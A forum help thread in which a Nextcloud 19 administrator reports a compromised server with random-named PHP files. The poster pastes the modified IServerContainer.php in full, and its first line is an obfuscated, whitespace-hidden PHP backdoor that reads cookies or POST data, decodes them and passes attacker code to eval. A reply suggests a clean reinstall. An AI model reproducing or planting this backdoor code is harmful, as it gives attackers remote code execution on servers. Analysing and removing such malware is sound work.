Corrupted php files - hacked or some other system error?

Nextcloud version : 19.0.0
Operating system and version : Ubuntu 16.04.6
Apache or nginx version : 2.4.18
PHP version : 7.4

The issue you are facing: Nextcloud appears corrupted / hacked

Is this the first time you’ve seen this error? : N - happened on a previous install also.

Steps to replicate it:

Site is giving error 500
Multiple php files appear modified:
Listing cloud root shows:

2pvtehya.php apps cscrb097.php index.php onar904c.php status.php version.php
2t22pm99.php AUTHORS data j2tjiv8y.php public.php themes xa0eehei.php
3rdparty cache dk7js0nh.php lib remote.php u2bhhru3.php zu3xksv1.php
3tmb8rh5.php config ebyzu62z.php occ resources udwyhx.php
3uaqkn6j.php console.php fskeurti.php ocm-provider rhpetuln.php updater
65dpdszg.php COPYING gq97zdsd.php ocs rjixtefh.php v3h00tgo.php
a39wd4oi.php core index.html.bak.bak ocs-provider robots.txt vbbvikra.php

Various php files appear to have been modified - see example below the config.php below…

The output of your config.php file in /path/to/nextcloud (make sure you remove any identifiable information!):

<?php
$CONFIG = array (
  'instanceid' => 'HIDDEN',
  'passwordsalt' => 'HIDDEN',
  'secret' => 'HIDDEN',
  'trusted_domains' => 
  array (
    0 => 'cloud.MYSERVER.com',
  ),
  'datadirectory' => '/var/www/cloud/data',
  'dbtype' => 'mysql',
  'version' => '19.0.0.12',
  'overwrite.cli.url' => 'https://cloud.MYSERVER.com',
  'dbname' => 'cloud',
  'dbhost' => 'localhost',
  'dbport' => '',
  'dbtableprefix' => 'oc_',
  'mysql.utf8mb4' => true,
  'dbuser' => 'MYUSERNAME',
  'dbpassword' => 'HIDDEN',
  'installed' => true,
);

The output of your Apache/nginx/system log in /var/log/____:

Multiple errors like:

[Sun Aug 02 06:26:59.706771 2020] [php7:error] [pid 7751] [client 61.245.154.104:53297] PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script in /var/www/cloud/lib/public/IServerContainer.php on line 49

Contents of file IServerContainer.php are modified:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $ab9a9c6 = 767;$GLOBALS['i2fe084c'] = Array();global $i2fe084c;$i2fe084c = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['f3c5c7f'] = "\x71\x59\x72\x46\x27\x76\x47\x31\x7b\x77\x22\x57\x23\x2b\x3d\x7d\x4b\x4f\x65\x6e\x5b\x6b\x79\x48\x3f\x5c\x62\x32\x4a\x37\x68\x28\x20\x21\x35\x4d\x7a\x9\x30\x44\x3a\x49\x3b\x2e\x25\x41\x58\x75\x29\x60\x56\x61\x2a\x63\x2f\x38\x66\x55\x26\x7e\x53\xa\x54\x4e\x74\x4c\x6f\x52\x64\x2c\x3e\x69\x50\x67\x6c\x42\x34\x33\x5e\x45\x5a\x36\x43\x6d\x70\x78\x5f\x39\x6a\x51\x73\x2d\x3c\xd\x24\x40\x5d\x7c";$i2fe084c[$i2fe084c['f3c5c7f'][21].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][18]] = $i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][30].$i2fe084c['f3c5c7f'][2];$i2fe084c[$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][55].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][34]] = $i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][68];$i2fe084c[$i2fe084c['f3c5c7f'][88].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][27]] = $i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][19];$i2fe084c[$i2fe084c['f3c5c7f'][5].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][87]] = $i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][19].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][64];$i2fe084c[$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][27]] = $i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][36].$i2fe084c['f3c5c7f'][18];$i2fe084c[$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][27]] = $i2fe084c['f3c5c7f'][84].$i2fe084c['f3c5c7f'][30].$i2fe084c['f3c5c7f'][84].$i2fe084c['f3c5c7f'][5].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][19];$i2fe084c[$i2fe084c['f3c5c7f'][85].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][81]] = $i2fe084c['f3c5c7f'][47].$i2fe084c['f3c5c7f'][19].$i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][36].$i2fe084c['f3c5c7f'][18];$i2fe084c[$i2fe084c['f3c5c7f'][0].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][55]] = $i2fe084c['f3c5c7f'][26].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][76].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][18];$i2fe084c[$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][18]] = $i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][83].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][83].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][64];$i2fe084c[$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][7]] = $i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][26].$i2fe084c['f3c5c7f'][53];$i2fe084c[$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][56]] = $i2fe084c['f3c5c7f'][22].$i2fe084c['f3c5c7f'][76].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][18];$i2fe084c[$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][26].$i2fe084c['f3c5c7f'][7]] = $_POST;$i2fe084c[$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][29]] = $_COOKIE;@$i2fe084c[$i2fe084c['f3c5c7f'][5].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][87]]($i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][73], NULL);@$i2fe084c[$i2fe084c['f3c5c7f'][5].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][87]]($i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][73].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][90], 0);@$i2fe084c[$i2fe084c['f3c5c7f'][5].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][87]]($i2fe084c['f3c5c7f'][83].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][85].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][85].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][47].$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][19].$i2fe084c['f3c5c7f'][86].$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][71].$i2fe084c['f3c5c7f'][83].$i2fe084c['f3c5c7f'][18], 0);@$i2fe084c[$i2fe084c['f3c5c7f'][66].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][18]](0);$v3672f2b = NULL;$a85fdf42 = NULL;$i2fe084c[$i2fe084c['f3c5c7f'][47].$i2fe084c['f3c5c7f'][26].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][76].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][81]] = $i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][91].$i2fe084c['f3c5c7f'][27].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][55].$i2fe084c['f3c5c7f'][91].$i2fe084c['f3c5c7f'][76].$i2fe084c['f3c5c7f'][76].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][91].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][76].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][91].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][55].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][55];global $ub047f6;function  y47e($v3672f2b, $f41d245e){global $i2fe084c;$y0ce = "";for ($l1b758a21=0; $l1b758a21<$i2fe084c[$i2fe084c['f3c5c7f'][88].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][27]]($v3672f2b);){for ($r519=0; $r519<$i2fe084c[$i2fe084c['f3c5c7f'][88].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][27]]($f41d245e) && $l1b758a21<$i2fe084c[$i2fe084c['f3c5c7f'][88].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][27]]($v3672f2b); $r519++, $l1b758a21++){$y0ce .= $i2fe084c[$i2fe084c['f3c5c7f'][21].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][18]]($i2fe084c[$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][55].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][34]]($v3672f2b[$l1b758a21]) ^ $i2fe084c[$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][55].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][34]]($f41d245e[$r519]));}}return $y0ce;}function  rd97bc($v3672f2b, $f41d245e){global $i2fe084c;global $ub047f6;return $i2fe084c[$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][56]]($i2fe084c[$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][56]]($v3672f2b, $ub047f6), $f41d245e);}foreach ($i2fe084c[$i2fe084c['f3c5c7f'][2].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][29]] as $f41d245e=>$fb0a){$v3672f2b = $fb0a;$a85fdf42 = $f41d245e;}if (!$v3672f2b){foreach ($i2fe084c[$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][26].$i2fe084c['f3c5c7f'][7]] as $f41d245e=>$fb0a){$v3672f2b = $fb0a;$a85fdf42 = $f41d245e;}}$v3672f2b = @$i2fe084c[$i2fe084c['f3c5c7f'][85].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][56].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][77].$i2fe084c['f3c5c7f'][81]]($i2fe084c[$i2fe084c['f3c5c7f'][74].$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][29].$i2fe084c['f3c5c7f'][7]]($i2fe084c[$i2fe084c['f3c5c7f'][0].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][55]]($v3672f2b), $a85fdf42));if (isset($v3672f2b[$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][21]]) && $ub047f6==$v3672f2b[$i2fe084c['f3c5c7f'][51].$i2fe084c['f3c5c7f'][21]]){if ($v3672f2b[$i2fe084c['f3c5c7f'][51]] == $i2fe084c['f3c5c7f'][71]){$l1b758a21 = Array($i2fe084c['f3c5c7f'][84].$i2fe084c['f3c5c7f'][5] => @$i2fe084c[$i2fe084c['f3c5c7f'][64].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][18].$i2fe084c['f3c5c7f'][68].$i2fe084c['f3c5c7f'][34].$i2fe084c['f3c5c7f'][27]](),$i2fe084c['f3c5c7f'][90].$i2fe084c['f3c5c7f'][5] => $i2fe084c['f3c5c7f'][7].$i2fe084c['f3c5c7f'][43].$i2fe084c['f3c5c7f'][38].$i2fe084c['f3c5c7f'][91].$i2fe084c['f3c5c7f'][7],);echo @$i2fe084c[$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][81].$i2fe084c['f3c5c7f'][53].$i2fe084c['f3c5c7f'][87].$i2fe084c['f3c5c7f'][27]]($l1b758a21);}elseif ($v3672f2b[$i2fe084c['f3c5c7f'][51]] == $i2fe084c['f3c5c7f'][18]){eval/*c4d6f968*/($v3672f2b[$i2fe084c['f3c5c7f'][68]]);}exit();} ?>
<?php /** * @copyright Copyright (c) 2016, ownCloud, Inc. * * @author Arthur Schiwon * @author Bart Visscher * @author Bernh etc

This doesn’t look good for me. Do you see the date when the files were created? Looks a bit like your permissions are not good and someone can modify files. Can be the basic configuration, could be outdated tools (phpmyadmin etc.), … With creation dates and logfiles you can perhaps narrow it down.

I’d consider a new setup, with a recent OS (LTS 18.04 or even 20.04), since it happened before, don’t use the same installation manual, the bad configuration might come from there.

[Belated] thanks for your helpful reply - yes am starting again…

1 Like